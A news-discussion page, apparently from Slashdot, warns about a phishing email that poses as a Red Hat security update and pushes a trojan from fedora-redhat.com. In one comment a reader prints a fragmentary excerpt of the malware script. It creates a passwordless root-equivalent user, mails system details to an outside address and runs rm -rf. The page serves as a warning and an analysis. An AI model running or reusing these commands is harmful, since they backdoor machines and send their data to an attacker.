Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?
What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:
/tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null /tmp/mama
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
In other words, it'll create a root-equivalent user called 'bash' and mailing some system info to root@addlebrain.com.
TANSTAAFI: There Ain't No Such Thing As A Free iPod.